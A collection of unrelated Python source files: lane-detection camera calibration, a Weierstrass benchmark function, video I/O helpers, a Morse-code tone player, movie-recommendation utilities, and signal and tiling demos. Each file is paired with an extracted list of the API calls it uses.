    slope1, intercept1 = line1
    slope2, intercept2 = line2
    x = (intercept2 - intercept1) / (slope1 - slope2)
    return x, slope1 * x + intercept1
def get_py_from_vp(u_i, v_i, K):
    """Recover the camera pitch and yaw [rad] from a vanishing point
    (u_i, v_i) in pixel coordinates, given the intrinsic matrix K.

    The vanishing point is back-projected into a unit viewing ray; pitch and
    yaw follow from its components.
    """
    ray = np.dot(np.linalg.inv(K), np.array([u_i, v_i, 1]))
    r3 = ray / np.linalg.norm(ray)
    pitch = np.arcsin(r3[1].item())
    yaw = -np.arctan(r3[0].item() / r3[2].item())
    return pitch, yaw
class CalibratedLaneDetector(LaneDetector):
    """Lane detector that auto-calibrates camera pitch and yaw.

    The vanishing point of the two fitted lane-boundary lines is converted
    into a (pitch, yaw) sample; once 100 samples have been collected, their
    average (in degrees) replaces the current camera geometry.
    """

    def __init__(self, calib_cut_v=200, cam_geom=None, model_path='./fastai_model.pth'):
        """
        :param calib_cut_v: Calibration row threshold -- TODO confirm exact meaning
            (stored but not used in this class's visible code).
        :param cam_geom: Initial camera geometry; a fresh ``CameraGeometry()``
            is created when omitted.  BUGFIX: the original used the mutable
            default argument ``cam_geom=CameraGeometry()``, which shared one
            geometry instance across every detector created with the default.
        :param model_path: Path to the serialized segmentation model.
        """
        if cam_geom is None:
            cam_geom = CameraGeometry()
        super().__init__(cam_geom, model_path)
        self.calib_cut_v = calib_cut_v
        self.estimated_pitch_deg = 0
        self.estimated_yaw_deg = 0
        self.update_cam_geometry()
        # Reject line fits whose mean residual exceeds this value; this
        # avoids calibrating on curved road segments.
        self.mean_residuals_thresh = 10.0
        self.pitch_yaw_history = []
        self.calibration_success = False

    def update_pitch_yaw_history(self, pitch, yaw):
        """Record one (pitch, yaw) sample [rad]; every 100 samples, average
        them (converted to degrees) and rebuild the camera geometry."""
        self.pitch_yaw_history.append([pitch, yaw])
        if len(self.pitch_yaw_history) == 100:
            history = np.array(self.pitch_yaw_history)
            means_deg = np.rad2deg(np.sum(history, axis=0)) / len(history)
            self.estimated_pitch_deg, self.estimated_yaw_deg = means_deg
            self.pitch_yaw_history = []  # plain list again for cheap appends
            self.update_cam_geometry()

    def get_fit_and_probs(self, image):
        """Run inference on ``image``, update the calibration from the lane
        lines' vanishing point when both boundaries admit a straight-line
        fit, and return (left_poly, right_poly, left_probs, right_probs)."""
        _, left_probs, right_probs = self.detect(image)
        line_left = self._fit_line_v_of_u(left_probs)
        line_right = self._fit_line_v_of_u(right_probs)
        if (line_left is not None) and (line_right is not None):
            u_i, v_i = get_intersection(line_left, line_right)
            pitch, yaw = get_py_from_vp(u_i, v_i, self.cg.intrinsic_matrix)
            self.update_pitch_yaw_history(pitch, yaw)
        left_poly = self.fit_poly(left_probs)
        right_poly = self.fit_poly(right_probs)
        return left_poly, right_poly, left_probs, right_probs

    def _fit_line_v_of_u(self, probs):
        """Fit a straight line v(u) to pixels with probability > 0.3.

        :return: ``np.poly1d`` of the fit, or None when there are no such
            pixels or the mean residual is too large (boundary likely curved).
        """
        v_list, u_list = np.nonzero(probs > 0.3)
        if v_list.size == 0:
            return None
        coeffs, residuals, _, _, _ = np.polyfit(
            u_list, v_list, deg=1, full=True)
        # polyfit returns an empty residual array for degenerate fits
        # (<= 2 points); treat those as perfect instead of misbehaving on
        # an empty array.
        mean_residuals = residuals[0] / len(u_list) if residuals.size else 0.0
        if mean_residuals > self.mean_residuals_thresh:
            return None
        return np.poly1d(coeffs)

    def update_cam_geometry(self):
        """Rebuild ``self.cg`` with the current pitch/yaw estimates and
        refresh the precomputed ground-plane grid."""
        self.cg = CameraGeometry(
            height=self.cg.height,
            roll_deg=self.cg.roll_deg,
            image_width=self.cg.image_width,
            image_height=self.cg.image_height,
            field_of_view_deg=self.cg.field_of_view_deg,
            pitch_deg=self.estimated_pitch_deg,
            yaw_deg=self.estimated_yaw_deg)
        self.cut_v, self.grid = self.cg.precompute_grid()
| [
"sys.path.append",
"numpy.poly1d",
"numpy.sum",
"numpy.polyfit",
"numpy.nonzero",
"numpy.linalg.norm",
"numpy.linalg.inv",
"numpy.array",
"solutions.lane_detection.camera_geometry.CameraGeometry"
] | [((154, 183), 'sys.path.append', 'sys.path.append', (['"""../../code"""'], {}), "('../../code')\n", (169, 183), False, 'import sys\n'), ((555, 571), 'numpy.linalg.inv', 'np.linalg.inv', (['K'], {}), '(K)\n', (568, 571), True, 'import numpy as np\n'), ((651, 668), 'numpy.linalg.norm', 'np.linalg.norm', (['x'], {}), '(x)\n', (665, 668), True, 'import numpy as np\n'), ((904, 920), 'solutions.lane_detection.camera_geometry.CameraGeometry', 'CameraGeometry', ([], {}), '()\n', (918, 920), False, 'from solutions.lane_detection.camera_geometry import CameraGeometry\n'), ((2800, 2823), 'numpy.nonzero', 'np.nonzero', (['(probs > 0.3)'], {}), '(probs > 0.3)\n', (2810, 2823), True, 'import numpy as np\n'), ((2916, 2960), 'numpy.polyfit', 'np.polyfit', (['u_list', 'v_list'], {'deg': '(1)', 'full': '(True)'}), '(u_list, v_list, deg=1, full=True)\n', (2926, 2960), True, 'import numpy as np\n'), ((3215, 3473), 'solutions.lane_detection.camera_geometry.CameraGeometry', 'CameraGeometry', ([], {'height': 'self.cg.height', 'roll_deg': 'self.cg.roll_deg', 'image_width': 'self.cg.image_width', 'image_height': 'self.cg.image_height', 'field_of_view_deg': 'self.cg.field_of_view_deg', 'pitch_deg': 'self.estimated_pitch_deg', 'yaw_deg': 'self.estimated_yaw_deg'}), '(height=self.cg.height, roll_deg=self.cg.roll_deg,\n image_width=self.cg.image_width, image_height=self.cg.image_height,\n field_of_view_deg=self.cg.field_of_view_deg, pitch_deg=self.\n estimated_pitch_deg, yaw_deg=self.estimated_yaw_deg)\n', (3229, 3473), False, 'from solutions.lane_detection.camera_geometry import CameraGeometry\n'), ((612, 637), 'numpy.array', 'np.array', (['[[u_i, v_i, 1]]'], {}), '([[u_i, v_i, 1]])\n', (620, 637), True, 'import numpy as np\n'), ((1698, 1730), 'numpy.array', 'np.array', (['self.pitch_yaw_history'], {}), '(self.pitch_yaw_history)\n', (1706, 1730), True, 'import numpy as np\n'), ((3140, 3157), 'numpy.poly1d', 'np.poly1d', (['coeffs'], {}), '(coeffs)\n', (3149, 3157), True, 'import numpy as 
np\n'), ((1584, 1603), 'numpy.sum', 'np.sum', (['lst'], {'axis': '(0)'}), '(lst, axis=0)\n', (1590, 1603), True, 'import numpy as np\n')] |
# encoding=utf8
"""Implementations of Weierstrass functions."""
import numpy as np
from niapy.problems.problem import Problem
__all__ = ['Weierstrass']
class Weierstrass(Problem):
    r"""Weierstrass benchmark function.

    :math:`f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k
    \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D
    \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right)`

    Usually evaluated on the hypercube :math:`x_i \in [-100, 100]` with the
    default parameters a = 0.5, b = 3 and k_max = 20.

    **Global minimum:** :math:`f(x^*) = 0`

    Reference:
        http://www5.zzu.edu.cn/__local/A/69/BC/D3B5DFE94CD2574B38AD7CD1D12_C802DAFE_BC0C0.pdf
    """

    def __init__(self, dimension=4, lower=-100.0, upper=100.0, a=0.5, b=3, k_max=20, *args, **kwargs):
        r"""Initialize the Weierstrass problem.

        Args:
            dimension (Optional[int]): Dimension of the problem.
            lower (Optional[Union[float, Iterable[float]]]): Lower bounds of the problem.
            upper (Optional[Union[float, Iterable[float]]]): Upper bounds of the problem.
            a (Optional[float]): The a parameter.
            b (Optional[float]): The b parameter.
            k_max (Optional[int]): Number of series terms to compute.

        See Also:
            :func:`niapy.problems.Problem.__init__`
        """
        super().__init__(dimension, lower, upper, *args, **kwargs)
        self.a = a
        self.b = b
        self.k_max = k_max

    @staticmethod
    def latex_code():
        r"""Return the latex code of the problem.

        Returns:
            str: Latex code.
        """
        return r'''$f(\textbf{x}) = \sum_{i=1}^D \left( \sum_{k=0}^{k_{max}} a^k \cos\left( 2 \pi b^k ( x_i + 0.5) \right) \right) - D \sum_{k=0}^{k_{max}} a^k \cos \left( 2 \pi b^k \cdot 0.5 \right)$'''

    def _evaluate(self, x):
        # NOTE(review): k runs over range(k_max), i.e. 0..k_max-1, while the
        # docstring formula shows an inclusive upper bound; preserved as-is
        # for reproducibility of published results.
        outer = 0.0
        for i in range(self.dimension):
            inner = 0.0
            for k in range(self.k_max):
                inner += self.a ** k * np.cos(2.0 * np.pi * self.b ** k * (x[i] + 0.5))
            outer += inner
        bias = 0.0
        for k in range(self.k_max):
            bias += self.a ** k * np.cos(2 * np.pi * self.b ** k * 0.5)
        return outer - self.dimension * bias
# vim: tabstop=3 noexpandtab shiftwidth=3 softtabstop=3
| [
"numpy.cos"
] | [((3029, 3066), 'numpy.cos', 'np.cos', (['(2 * np.pi * self.b ** k * 0.5)'], {}), '(2 * np.pi * self.b ** k * 0.5)\n', (3035, 3066), True, 'import numpy as np\n'), ((2867, 2915), 'numpy.cos', 'np.cos', (['(2.0 * np.pi * self.b ** k * (x[i] + 0.5))'], {}), '(2.0 * np.pi * self.b ** k * (x[i] + 0.5))\n', (2873, 2915), True, 'import numpy as np\n')] |
import warnings
from typing import Optional
import cv2
import numpy as np
from utils.tools import TimerBlock
class VideoData:
    """In-memory video clip: an array of frames plus the clip's frame rate.

    Frames may be stored either as NHWC (frame, height, width, channel) or as
    NCHW; the layout is detected heuristically by :attr:`is_nchw`.
    """

    def __init__(self, frames, fps, is_rgb=True):
        """
        :param frames: Sequence/array of frames, NHWC or NCHW.
        :param fps: Frames per second of the clip.
        :param is_rgb: Whether channels are ordered RGB (False implies BGR).
        """
        self.frames = np.array(frames)
        self.fps = fps
        self.is_rgb = is_rgb
        # NCHW keeps (H, W) in the last two axes; NHWC keeps them in axes 1..2.
        self.height, self.width = self.frames.shape[-2:] if self.is_nchw else self.frames.shape[1:-1]

    def __iter__(self):
        return iter(self.frames)

    def __len__(self):
        return len(self.frames)

    @property
    def num_frames(self):
        return len(self.frames)

    @property
    def shape(self):
        """(height, width) of a single frame."""
        return self.height, self.width

    @property
    def is_nchw(self):
        """Heuristic layout check: the channel axis (1 or 3 channels) sits at
        index 1 and is no larger than axis 3."""
        return (self.frames.shape[1] == 3 or self.frames.shape[1] == 1) and self.frames.shape[1] <= self.frames.shape[3]

    def to_nchw(self):
        """Return a copy of this clip in NCHW layout.

        BUGFIX: the original dropped ``is_rgb`` when building the new object
        (it silently reverted to the default True); the flag is now carried
        over in both branches.
        """
        if self.is_nchw:
            return VideoData(self.frames.copy(), self.fps, is_rgb=self.is_rgb)
        else:
            return VideoData(self.frames.transpose((0, 3, 1, 2)), self.fps, is_rgb=self.is_rgb)
# TODO: Refactor this method to be a static member of the VideoData class.
def read_video(video_path, logger: Optional[TimerBlock] = None, convert_to_rgb=True):
    """
    Read a video from a file.

    :param video_path: The path to the video file.
    :param logger: The `TimedBlock` object used for handling log output.
    :param convert_to_rgb: Whether to convert the colour channel order to RGB from BGR (this is the default for OpenCV).
    :return: The video wrapped in a `VideoData` object.
    """
    # When no logger is supplied, create one and close it before returning.
    owns_logger = logger is None
    if owns_logger:
        logger = TimerBlock("Reading Video")
        logger.__enter__()

    capture = cv2.VideoCapture(video_path)
    if not capture.isOpened():
        raise RuntimeError("Could not open video from the path {}.".format(video_path))
    logger.log("Opened video from the path {}.".format(video_path))

    frames = []
    while capture.isOpened():
        has_frame, frame = capture.read()
        if not has_frame:
            break
        if convert_to_rgb:
            frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
        frames.append(frame)
        logger.log("Extracted {:,d} video frames.\r".format(len(frames)), end="")
    print()

    width = int(capture.get(cv2.CAP_PROP_FRAME_WIDTH))
    height = int(capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
    logger.log("Frame dimensions: {}x{}.".format(width, height))
    fps = capture.get(cv2.CAP_PROP_FPS)
    logger.log("Frames per second: {}.".format(fps))

    if capture.isOpened():
        capture.release()
    if owns_logger:
        logger.__exit__(None, None, None)

    return VideoData(frames, fps, is_rgb=convert_to_rgb)
def write_video(video_data, video_output_path, logger: Optional[TimerBlock] = None):
    """Encode a `VideoData` clip (NCHW, uint8; RGB or single-channel, which is
    stacked to three channels) to a DIVX-compressed file.

    :param video_data: The clip to encode.
    :param video_output_path: Destination file path.
    :param logger: Optional `TimerBlock` for log output; created (and closed)
        internally when omitted.
    """
    owns_logger = logger is None
    if owns_logger:
        logger = TimerBlock("Writing Video")
        logger.__enter__()

    fourcc = cv2.VideoWriter_fourcc(*"DIVX")
    writer = cv2.VideoWriter(video_output_path, fourcc, video_data.fps, (video_data.width, video_data.height))

    frames = video_data.frames
    if frames.shape[1] == 1:
        warnings.warn("Was given input with one colour channel, stacking frames to get three channels.")
        frames = np.concatenate([frames] * 3, axis=1)
    assert frames.shape[1] == 3, \
        "Video must be in NCHW format and be RGB (i.e. C=3). Got {} shaped input.".format(frames.shape)
    assert frames.dtype == np.uint8, "Frames must be uint8, got {}.".format(frames.dtype)

    for index, frame in enumerate(frames):
        # cv2 expects HWC frames, so transpose back from CHW.
        writer.write(frame.transpose((1, 2, 0)))
        logger.log("Wrote {}/{} frames.\r".format(index + 1, len(frames)), end="")
    print()

    writer.release()
    logger.log("Wrote video to {}.".format(video_output_path))
    if owns_logger:
        logger.__exit__(None, None, None)
| [
"cv2.VideoWriter_fourcc",
"cv2.cvtColor",
"cv2.VideoCapture",
"numpy.array",
"cv2.VideoWriter",
"warnings.warn",
"utils.tools.TimerBlock",
"numpy.concatenate"
] | [((1688, 1716), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video_path'], {}), '(video_path)\n', (1704, 1716), False, 'import cv2\n'), ((3008, 3039), 'cv2.VideoWriter_fourcc', 'cv2.VideoWriter_fourcc', (["*'DIVX'"], {}), "(*'DIVX')\n", (3030, 3039), False, 'import cv2\n'), ((3059, 3161), 'cv2.VideoWriter', 'cv2.VideoWriter', (['video_output_path', 'fourcc', 'video_data.fps', '(video_data.width, video_data.height)'], {}), '(video_output_path, fourcc, video_data.fps, (video_data.\n width, video_data.height))\n', (3074, 3161), False, 'import cv2\n'), ((202, 218), 'numpy.array', 'np.array', (['frames'], {}), '(frames)\n', (210, 218), True, 'import numpy as np\n'), ((1578, 1605), 'utils.tools.TimerBlock', 'TimerBlock', (['"""Reading Video"""'], {}), "('Reading Video')\n", (1588, 1605), False, 'from utils.tools import TimerBlock\n'), ((2903, 2930), 'utils.tools.TimerBlock', 'TimerBlock', (['"""Writing Video"""'], {}), "('Writing Video')\n", (2913, 2930), False, 'from utils.tools import TimerBlock\n'), ((3226, 3332), 'warnings.warn', 'warnings.warn', (['"""Was given input with one colour channel, stacking frames to get three channels."""'], {}), "(\n 'Was given input with one colour channel, stacking frames to get three channels.'\n )\n", (3239, 3332), False, 'import warnings\n'), ((3340, 3376), 'numpy.concatenate', 'np.concatenate', (['([frames] * 3)'], {'axis': '(1)'}), '([frames] * 3, axis=1)\n', (3354, 3376), True, 'import numpy as np\n'), ((2101, 2139), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2RGB'], {}), '(frame, cv2.COLOR_BGR2RGB)\n', (2113, 2139), False, 'import cv2\n')] |
#!/usr/bin/python3 -d
import numpy as np
import simpleaudio as sa
class Didah:
    """Morse-code audio generator.

    Pre-renders the dit/dah tones and the matching silences once (in
    ``__init__``) and plays them through simpleaudio on demand.
    """

    FS = 44100            # samples per second
    NUM_CHANNELS = 1      # mono playback
    BYTES_PER_SAMPLE = 2  # 16-bit audio

    # Pre-rendered sample buffers, filled in by __init__ (class-level, so
    # they are shared by all instances).
    dit_sound = None
    dah_sound = None
    space_sound = None
    letter_space_sound = None
    word_space_sound = None

    def generate_tone(self, dur, freq):
        """Return a mono int16 sine tone of ``dur`` seconds at ``freq`` Hz."""
        # Generate array with seconds*sample_rate steps between 0 and seconds.
        t = np.linspace(0, dur, int(dur * Didah.FS), False)
        # Generate sine wave for frequency.
        note = np.sin(freq * t * 2 * np.pi)
        # Scale so the highest value fills the signed 16-bit range.
        audio = note * (2 ** 15 - 1) / np.max(np.abs(note))
        return audio.astype(np.int16)

    def generate_silence(self, dur):
        """Return ``dur`` seconds of mono int16 silence.

        BUGFIX: the original built a (N, 2) two-channel buffer, but playback
        uses NUM_CHANNELS=1, so the interleaved samples made every silence
        last twice as long as intended.  The buffer is now mono like the
        tones.
        """
        return np.zeros(int(Didah.FS * dur), dtype=np.int16)

    def play_tone(self, audio):
        """Play a sample buffer and block until playback has finished."""
        play_obj = sa.play_buffer(audio, Didah.NUM_CHANNELS,
                                  Didah.BYTES_PER_SAMPLE, Didah.FS)
        play_obj.wait_done()

    def dit(self):
        self.play_tone(Didah.dit_sound)

    def dah(self):
        self.play_tone(Didah.dah_sound)

    def space(self):
        self.play_tone(Didah.space_sound)

    def letter_space(self):
        self.play_tone(Didah.letter_space_sound)

    def word_space(self):
        self.play_tone(Didah.word_space_sound)

    def __init__(self, freq=440, wpm=25):
        """Pre-render all Morse elements for ``wpm`` words per minute at
        ``freq`` Hz (dit duration = 6 / (5 * wpm) = 1.2 / wpm seconds)."""
        self.freq = freq
        dit_dur = 6.0 / (5.0 * wpm)
        dah_dur = dit_dur * 3
        space_dur = dit_dur            # gap between symbols of one letter
        letter_space_dur = dit_dur * 3
        word_space_dur = dit_dur * 7
        Didah.dit_sound = self.generate_tone(dit_dur, freq)
        Didah.dah_sound = self.generate_tone(dah_dur, freq)
        Didah.space_sound = self.generate_silence(space_dur)
        Didah.letter_space_sound = self.generate_silence(letter_space_dur)
        Didah.word_space_sound = self.generate_silence(word_space_dur)
if __name__ == "__main__":
cw = Didah()
cw.dit()
cw.space()
cw.dit()
cw.space()
cw.dit()
cw.letter_space()
cw.dah()
cw.space()
cw.dah()
cw.space()
cw.dah()
cw.letter_space()
cw.dit()
cw.space()
cw.dit()
cw.space()
cw.dit()
cw.word_space()
| [
"numpy.abs",
"numpy.sin",
"simpleaudio.play_buffer"
] | [((527, 555), 'numpy.sin', 'np.sin', (['(freq * t * 2 * np.pi)'], {}), '(freq * t * 2 * np.pi)\n', (533, 555), True, 'import numpy as np\n'), ((996, 1071), 'simpleaudio.play_buffer', 'sa.play_buffer', (['audio', 'Didah.NUM_CHANNELS', 'Didah.BYTES_PER_SAMPLE', 'Didah.FS'], {}), '(audio, Didah.NUM_CHANNELS, Didah.BYTES_PER_SAMPLE, Didah.FS)\n', (1010, 1071), True, 'import simpleaudio as sa\n'), ((656, 668), 'numpy.abs', 'np.abs', (['note'], {}), '(note)\n', (662, 668), True, 'import numpy as np\n')] |
"""
INTERFACE
- movies with shape (#number of movies, #features(title, year, genres, ...))
- user_item_matrix with shape (#number of users, #number of movies)
- top_list with shape (#number of movies, 2)
- item-item matrix with shape (#number of popular movies, #number of popular movies)
- nmf_model: trained sklearn NMF model
"""
import pandas as pd
import numpy as np
from fuzzywuzzy import process
import pickle
from bs4 import BeautifulSoup
import requests
#r_df = pd.read_csv('./data/ratings.csv', sep=',', index_col=[1]) # read in from hard-drive
#movies = pd.read_csv('./data/movies.csv', sep=',', index_col=[0]) # read in from hard-drive
#top_df = pd.read_csv('./data/top_df.csv', sep=',', index_col=[0])
#l_df = pd.read_csv('./data/links.csv', sep=',', index_col=0)
#print(movies.head())
def get_top_match(movie_title, movie_list):
#movieId,title,genres
match = process.extract(movie_title,movie_list, limit=3)
return match
def create_user_vector_with_title(movie_dict, movies):
"""
convert dict of user_ratings to a user_vector
"""
# generate the user vector
user_vector = pd.Series(np.nan, index=movies['title'])
user_vector[movie_dict.keys()] = movie_dict.values()
return user_vector
def clean_and_pivot_r_df(r_df, k=10):
r_df= r_df.drop(columns=['timestamp'])
r_df = r_df.pivot(columns='userId', values='rating')
r_df = r_df[r_df.notna().sum(axis=1)>k] #selecting only movies that have more than 10 rates
return r_df
def sort_r_df(r_df):
'''r_df is dataframe, usuallu the one processed by clean_and_pivot_r_df
returns r_df sorted by descending average rating'''
rating_ave = np.nanmean(r_df.values, axis=1) #row average (on the movies Id) for each user
r_df['ave_rating'] = pd.Series(rating_ave, index=r_df.index)
r_df_sorted = r_df.sort_values('ave_rating', ascending=False)
r_df_sorted.drop(columns=['ave_rating'], inplace=True)
return r_df_sorted
def get_user_vector_df(user_vector):
'''user_vector is a dict. key:movieID, value:ratings
Transform the user_vector in df'''
user_vector = pd.DataFrame(list(user_vector.values()), index=list(user_vector.keys()))
user_vector.columns=['rating']
return user_vector
def fill_user_vector_df(user_vector_df, top):
'''user_vector_df is the df of user_vector
Fills the df with ave_ratings'''
user_vector_filled = user_vector_df.loc[top.index]['rating'].fillna(top.loc[top.index]['ave_rating'])
user_vector_filled = pd.DataFrame(user_vector_filled).T
return user_vector_filled
def recommend_movies(prediction_df, user_vector_df):
'''prediction_df is a dataFrame with a prediction matrix made by a whatever model
user_vector_df is the df version of a user_vector (result of get_user_vector_df)
Returns a list of recommended movieIds'''
bool_mask_df = user_vector_df.isnull()
not_rated = prediction_df.columns[bool_mask_df['rating']]
#movies to recommend
movies_to_recommend = prediction_df[not_rated]
movies_to_recommend = movies_to_recommend.T
movies_to_recommend.columns = ['predicted_rating']
movies_to_recommend = movies_to_recommend.sort_values(by='predicted_rating', ascending=False)
recommended_moviesId = list(movies_to_recommend.index)
return recommended_moviesId
def create_user_vector(user_rating, top_tit_gen):
'''user_rating is the output of web application --> dict {'titanic':4,'orange':5,...}
top_tit_gen is a dataframe with videoId as index and title, genre as columns.
user_item_matrix is a dataframe of size (n_users x n_videos).
The function returns a dict: key is movieId and value is rating (Nan or a int)'''
movies_list = list(top_tit_gen.index)#list(user_item_matrix.columns)
empty_list = [np.nan] * len(movies_list)
ratings_dict = dict(zip(movies_list, empty_list))
for key, value in user_rating.items():
#title, similarity_score, movie_id = process.extract()
res = process.extract(key, top_tit_gen['title'],limit=1)
for r in res:
ratings_dict[r[2]] = value
return ratings_dict
def lookup_movieId(top, movieId):
'''top is the top_tit_gen df (n_movies x 3) --. cols: ave_rating, title, genre
movieId is a movie Id,
Returns the title of movie associated to movieId'''
title = list(top.loc[top.index == movieId]['title'])[0]
return title
def format_imdbId(imdbId):
'''imdbId is a int. Returns a str'''
imdbId = str(imdbId)
len_id = len(imdbId)
diff = 7 - len_id
for i in range(diff):
imdbId = '0'+imdbId
return imdbId
def get_imdbId(l_df, movie_id):
return l_df.loc[l_df.index == movie_id]['imdbId'].values[0]
def get_html_text(url):
resp = requests.get(url)
html = resp.text
soup = BeautifulSoup(html, features='html.parser')
return soup
def get_src(soup):
tag = soup.find('img')
src = tag.get('src')
return src
def get_href(soup):
tag = soup.find("a", {"class": "slate_button prevent-ad-overlay video-modal"})
href = tag.get('href')
return href
| [
"pandas.DataFrame",
"pandas.Series",
"requests.get",
"bs4.BeautifulSoup",
"fuzzywuzzy.process.extract",
"numpy.nanmean"
] | [((886, 935), 'fuzzywuzzy.process.extract', 'process.extract', (['movie_title', 'movie_list'], {'limit': '(3)'}), '(movie_title, movie_list, limit=3)\n', (901, 935), False, 'from fuzzywuzzy import process\n'), ((1128, 1168), 'pandas.Series', 'pd.Series', (['np.nan'], {'index': "movies['title']"}), "(np.nan, index=movies['title'])\n", (1137, 1168), True, 'import pandas as pd\n'), ((1678, 1709), 'numpy.nanmean', 'np.nanmean', (['r_df.values'], {'axis': '(1)'}), '(r_df.values, axis=1)\n', (1688, 1709), True, 'import numpy as np\n'), ((1781, 1820), 'pandas.Series', 'pd.Series', (['rating_ave'], {'index': 'r_df.index'}), '(rating_ave, index=r_df.index)\n', (1790, 1820), True, 'import pandas as pd\n'), ((4789, 4806), 'requests.get', 'requests.get', (['url'], {}), '(url)\n', (4801, 4806), False, 'import requests\n'), ((4839, 4882), 'bs4.BeautifulSoup', 'BeautifulSoup', (['html'], {'features': '"""html.parser"""'}), "(html, features='html.parser')\n", (4852, 4882), False, 'from bs4 import BeautifulSoup\n'), ((2528, 2560), 'pandas.DataFrame', 'pd.DataFrame', (['user_vector_filled'], {}), '(user_vector_filled)\n', (2540, 2560), True, 'import pandas as pd\n'), ((4022, 4073), 'fuzzywuzzy.process.extract', 'process.extract', (['key', "top_tit_gen['title']"], {'limit': '(1)'}), "(key, top_tit_gen['title'], limit=1)\n", (4037, 4073), False, 'from fuzzywuzzy import process\n')] |
import math
import numpy as np
def complexSignal(f1, f2, a1, a2, data_points = 3000, dT = 0.01,noisy = True,
mean = 0, std = 10,separate_signals = False):
if noisy:
noise = np.random.normal(mean, std, size=data_points)
else:
noise = np.zeros(shape=(data_points))
tremor1 = []
tremor2 = []
frequencies = np.zeros(shape=(2, data_points))
t = 0
for i in range(data_points):
t += dT
tremor1.append(a1*math.sin(2 * math.pi * f1 * t))
tremor2.append(a2* math.cos(2 * math.pi * f2 * t))
if a1 > a2:
frequencies[0][i] = f1
frequencies[1][i] = f2
else:
frequencies[0][i] = f2
frequencies[1][i] = f1
if separate_signals:
return tremor1, tremor2, noise
else:
return np.array(tremor1) + np.array(tremor2) + noise, frequencies | [
"numpy.zeros",
"math.sin",
"numpy.array",
"math.cos",
"numpy.random.normal"
] | [((373, 405), 'numpy.zeros', 'np.zeros', ([], {'shape': '(2, data_points)'}), '(shape=(2, data_points))\n', (381, 405), True, 'import numpy as np\n'), ((209, 254), 'numpy.random.normal', 'np.random.normal', (['mean', 'std'], {'size': 'data_points'}), '(mean, std, size=data_points)\n', (225, 254), True, 'import numpy as np\n'), ((281, 308), 'numpy.zeros', 'np.zeros', ([], {'shape': 'data_points'}), '(shape=data_points)\n', (289, 308), True, 'import numpy as np\n'), ((493, 523), 'math.sin', 'math.sin', (['(2 * math.pi * f1 * t)'], {}), '(2 * math.pi * f1 * t)\n', (501, 523), False, 'import math\n'), ((552, 582), 'math.cos', 'math.cos', (['(2 * math.pi * f2 * t)'], {}), '(2 * math.pi * f2 * t)\n', (560, 582), False, 'import math\n'), ((847, 864), 'numpy.array', 'np.array', (['tremor1'], {}), '(tremor1)\n', (855, 864), True, 'import numpy as np\n'), ((867, 884), 'numpy.array', 'np.array', (['tremor2'], {}), '(tremor2)\n', (875, 884), True, 'import numpy as np\n')] |
import cv2
import numpy as np
from math import sqrt, log, pi, sin, cos, floor
def populate_canvas(canvas, A, b):
B = np.array([[1, cos(pi/3.)], [0, sin(pi/3.)]])
T = np.linalg.inv(B)
B1 = B[:,0]
B2 = B[:,1]
for i in range(canvas.shape[0]):
y = (i*1./canvas.shape[0] - 0.5) * -H
for j in range(canvas.shape[1]):
x = (j*1./canvas.shape[1] - .5) * W
xy = np.array([[x],[y]])
xy = np.dot(A, xy) + b
uv = np.dot(T, xy)
u = uv[0,0]
v = uv[1,0]
r = u - floor(u)
s = v - floor(v)
P = np.array([0, 0]) if r < 1 - s else B1 + B2
Q = B1
R = B2
C = (P + Q + R)/3
rxy = B1 * r + B2 * s
d = sqrt(np.dot(rxy - C, rxy - C))
canvas[i,j,:] = 255 * (2 - d)
W = 5.
H = 5.
frame = 0
N = 9
canvas = np.zeros((400, 400, 3), dtype=np.uint8)
for i in range(N+1):
theta = pi / 3 * i / N
A = np.array([[cos(theta), -sin(theta)], [sin(theta), cos(theta)]])
b = np.array([[0],[0]])
populate_canvas(canvas, A, b)
cv2.imwrite(f"tanimation{frame}.png", canvas)
frame += 1
N = 6
for i in range(N+1):
theta = 0
A = np.array([[cos(theta), -sin(theta)], [sin(theta), cos(theta)]])
b = np.array([[-cos(pi/3)],[-sin(pi/3)]]) * i/N
populate_canvas(canvas, A, b)
cv2.imwrite(f"tanimation{frame}.png", canvas)
frame += 1
| [
"cv2.imwrite",
"numpy.zeros",
"math.floor",
"math.sin",
"numpy.array",
"numpy.linalg.inv",
"math.cos",
"numpy.dot"
] | [((896, 935), 'numpy.zeros', 'np.zeros', (['(400, 400, 3)'], {'dtype': 'np.uint8'}), '((400, 400, 3), dtype=np.uint8)\n', (904, 935), True, 'import numpy as np\n'), ((175, 191), 'numpy.linalg.inv', 'np.linalg.inv', (['B'], {}), '(B)\n', (188, 191), True, 'import numpy as np\n'), ((1064, 1084), 'numpy.array', 'np.array', (['[[0], [0]]'], {}), '([[0], [0]])\n', (1072, 1084), True, 'import numpy as np\n'), ((1122, 1167), 'cv2.imwrite', 'cv2.imwrite', (['f"""tanimation{frame}.png"""', 'canvas'], {}), "(f'tanimation{frame}.png', canvas)\n", (1133, 1167), False, 'import cv2\n'), ((1387, 1432), 'cv2.imwrite', 'cv2.imwrite', (['f"""tanimation{frame}.png"""', 'canvas'], {}), "(f'tanimation{frame}.png', canvas)\n", (1398, 1432), False, 'import cv2\n'), ((413, 433), 'numpy.array', 'np.array', (['[[x], [y]]'], {}), '([[x], [y]])\n', (421, 433), True, 'import numpy as np\n'), ((485, 498), 'numpy.dot', 'np.dot', (['T', 'xy'], {}), '(T, xy)\n', (491, 498), True, 'import numpy as np\n'), ((136, 149), 'math.cos', 'cos', (['(pi / 3.0)'], {}), '(pi / 3.0)\n', (139, 149), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((153, 166), 'math.sin', 'sin', (['(pi / 3.0)'], {}), '(pi / 3.0)\n', (156, 166), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((450, 463), 'numpy.dot', 'np.dot', (['A', 'xy'], {}), '(A, xy)\n', (456, 463), True, 'import numpy as np\n'), ((567, 575), 'math.floor', 'floor', (['u'], {}), '(u)\n', (572, 575), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((596, 604), 'math.floor', 'floor', (['v'], {}), '(v)\n', (601, 604), False, 'from math import sqrt, log, pi, sin, cos, floor\n'), ((621, 637), 'numpy.array', 'np.array', (['[0, 0]'], {}), '([0, 0])\n', (629, 